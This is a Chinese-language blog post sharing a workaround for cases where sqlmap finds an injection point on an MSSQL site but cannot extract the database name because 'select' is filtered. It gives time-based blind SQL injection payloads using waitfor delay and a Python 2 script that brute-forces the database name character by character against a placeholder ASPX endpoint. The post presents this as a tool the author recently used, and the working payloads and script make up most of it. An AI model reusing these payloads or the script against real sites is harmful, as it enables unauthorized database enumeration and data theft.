【实战分享】sqlmap显示有注入却无法爆出库名

sqlmap爆mssql数据库时采用的语句如下图：

从语句中不难看出，如果关键字select被“(非tamper绕过)处理”了，那sqlmap是无法爆出数据库的，这时我们可以使用原始的猜解法，

#判断数据库和用户名长度
'+if(len(db_name())=%s)+waitfor+delay+'0:0:5'--
'+if(len(user_name())=%s)+waitfor+delay+'0:0:5'--

#循环注出数据库和用户名
'+if(ascii(substring(db_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--
'+if(ascii(substring(user_name(),%s,1))=%s)+waitfor+delay+'0:0:5'--

分享一个最近用的时间延迟盲注爆库名脚本（手工测下库名长度）：

import urllib
import urllib2
import time
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.'
header = { 'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'  }
values={}
print 'Start to retrive database:'
user= ''

for i in range(1, 20):
for payload in payloads:
startTime=time.time()
try:
values['action']='getvideo'
values['pc_mob']='GP'
values['years']="' if(ascii(substring(db_name(),%s,1))=%s) waitfor delay '0:0:5'--" % (str(i),ord(payload))
data = urllib.urlencode(values)
url = "http://www.xxx.com/operation.aspx"
geturl = url+'?'+data
request = urllib2.Request(geturl,headers=header)
response = urllib2.urlopen(request)
if time.time()-startTime>5:
user+=payload
print 'the database is:'+user
break
else:
print 'dumping database...'
except Exception,e:
print e